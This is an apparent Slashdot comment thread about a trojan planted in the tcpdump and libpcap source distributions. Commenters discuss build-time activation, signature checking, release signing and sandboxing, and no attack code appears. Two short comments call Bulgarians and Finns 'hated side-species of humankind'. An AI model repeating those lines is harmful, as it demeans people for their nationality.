> I fetched tcpdump and libpcap and took a look in the sources, seems so as
> if we IMHO are not affected.
That is correct.
I've been at the console of the tcpdump.org server today, working with
Michael Richardson to investigate the problem. He will release a
statement on the details at some point. The system was not running an
up to date version of NetBSD, so there is no indication that users with
up to date systems are vulnerable to some new bug.
The trojan was installed within the last two days. The signatures in
pkgsrc are eight _months_ old. Users installing from pkgsrc (source, or
binary packages) could not be affected by this trojan without
specifically overriding the incorrect signature on the distribution
file.
Michael's contact information is listed in the whois entry for the
tcpdump.org domain, but as far as I know, he did not receive a call
about this issue, it was slashdotted.
--
Now if every open source developer had something along the following outline in their crontab...
ftp sources from ftp distribution server diff against known good copy mail if different
Maybe not practical for the biggest projects, but for the rest?
Idea 2 - responsible mirroring
Mirrors shouldn't accept changed sources without an accompanying bump in the version/release number in the filename - this would make it much easier to spot trojaned versions
Okay that relies on developers being careful to bump the release no. after every change (doc updates etc.)
"Linux is a serious competitor"
- Steve Ballmer, Chief Executive Microsoft Corp.
We contacted Joseph Shaw, who did the web design for the site and he tried many times to contact, The trojan was found about 11:15pm by 12:45 Joe was trying to contact Michael Richardson. Due to the nature that this was not an exploit but a trojan it seemed the best to report it rather than keep it hidden.
Bulgarian are not Russians, they are Bulgarians, a very hated side-species on humandkind.
Because Finns are as bad as Bulgarian, and are second most hated side-species of humankind.
I've been looking for something like this for a while: interactive security policy management of sandboxed applications. Upon cursory inspection, it looks like it only works with userspace syscalls, but I imagine that should do the trick 99% of the time (unless a nefarious kernel module is installed or the app can somehow access hardware directly?).
I'm hoping someone will make a console frontend... or maybe I will once I learn enough.
I've actually been worried about switching to linux for a while due to security reasons (namely that it seems to require an insane amount of diligence to maintain a secure system which changes dynamically -- i.e. trying out new apps all the time)... and oftentimes, apps need to be installed as root, which has no restrictions upon the powers given to the new program.
LIDS, LOMAC, etc. seem to require much prior consideration of policies (which, ideally, should be dictated by the creators of the program and/or by the major distrobutions, only to be inspected by the user or limited by the user's own global policies). btw: is there any program to convert between the policies established for the different security systems?
I am constantly trying out new software and if I can't sandbox it even a bit (like zonealarm interactively protecting net connections or secure4u for windows) then its not worth it.
Thanks again.
Because there only needs to be *one* person out there who *does* look at the diffs and catches the thing. *Not* every person needs to catch the thing.
Furthermore, analysis of what the thing is doing is much easier with open source.
May we never see th
Apparently, it was less than one day.
As someone else pointed out, the closed-source Interbase (DBMS) contained a trojan for over six years which was only found after it was open-sourced.
May we never see th
All the replying posts pointing out that it's a phone company/ISP and it's almost certainly nothing to do with this chap are at 2 or below, meaning that many people won't see them and this individual's name is now besmirched.
The sad part of this is the fact that we (people who have moderator points to give away) can't really fix the problem even after we're told about it. I could go back and mod down the misleading post, but then some metamoderator would see that I modded down what appears at face value to be an "interesting" post and I would be the one who was bitch-slapped for abusing my moderator points. All we can really do is mod up the replies, making the whole thread +5 in order to dilute the bad moderation.
...don't understand the ins and outs of Trojans (another joke). But why would you want to spend time writing flames for people who don't share your own brand of uber-geekery? Presumably those of us who spend time here do so in pursuit of some nerdy interest of our own.
Making trouble today for a better tomorrow...
According to OpenBSD Joural, OpenBSD is not affected. NOT AT ALL!!!
- Pcap and Tcpdump are brought in only periodically and after a thorough code review.
- OpenBSD rolls its own build system (for pcap and tcpdump).
The trojan affected the configure script and was activated at build time.
I Love OpenBSD!!!
Go to gnupg.org and install gpg. Generate a keypair and put your public key up on wwwkeys.pgp.net. Whenever you meet another developer, sign each others keys. When you release a tarball, FUCKING SIGN IT and put up instructions telling people how to verify it. This sort of thing does not have to happen. The tools are there to prevent anyone ever trojaning an FTP server again. You will have to do this eventually or no one will trust your server enough to download your software, so why not start now? GO AND FUCKING START.
</rant>
Sorry about that, but how many times does this have to happen? It's trivial to prevent, but most people don't even try. Go and damn well start!
...has just been knocked-down in reliability by SOMEONE FROM WITHIN THEIR OWN GROUP?!?!
I'm sorry, but I'm sitting here and having a (small) chuckle at the people who constantly attacked Microsoft for not being "secure" - people who now have (probably) been compromized (again) by someone (hopefully not) within the Open Source community, or at least someone who gained sufficient access to the source code to insert their code. From what I've read so far, this seems to have been a fairly trivial thing for the "infiltrator" to accomplish.
First, there were the trojanized versions of OpenSSH, BitchX, dsniff and a few other tools. Now, we have trojanized versions of some fairly non-trivial tools. What's next? Who knows? No one does.
The really funny thing is that because of it's own charter and design, the Open Source community has created their own FUD about their own products. Let's all hope that they take the initiative to prevent such things from happening again. Remember: "Fool me once, shame on you...fool me twice, shame on me...fool me five times and someone please kick me in the head!"
The really excellent thing about this happening is that the Open Source community got together, spread the info about the trojan/exploit rapidly and did an excellent job of damage control. The people that found the trojan (http://www.hlug.org) should be commended for their dedication to checking source code - something that should have happend (IMHO) quite a way up the development chain. Unfortunately, it appears that due to the very nature of Open Source development (i.e. the ability of pretty much ANYONE to contribute source-code to the development tree and even have it included in the latest CVS) that this will not be the last "event" concerning compromised source-code - unless the Open Source development community seriously re-work their development cycle and include exhaustive souce-code review before ANY source-code is released for "public" consumption.
ScottKin
I don't give a rat's behind about "karma" here or anywhere else. Don't like what I have to say here? Deal with it!
Why Gentoo is safe? How about Redhat and Mandrake? Are those safe? If not how do I can fix it? Please email me at gigsvoo@yahoo.com, thanks alot!
Thanks
Neo Gigs
"Follow the white rabbit..."
The Analytical Engine weaves Algebraical patterns just as the Jacquard
loom weaves flowers and leaves.
-- Ada Augusta, Countess of Lovelace, the first programmer
- this post brought to you by the Automated Last Post Generator...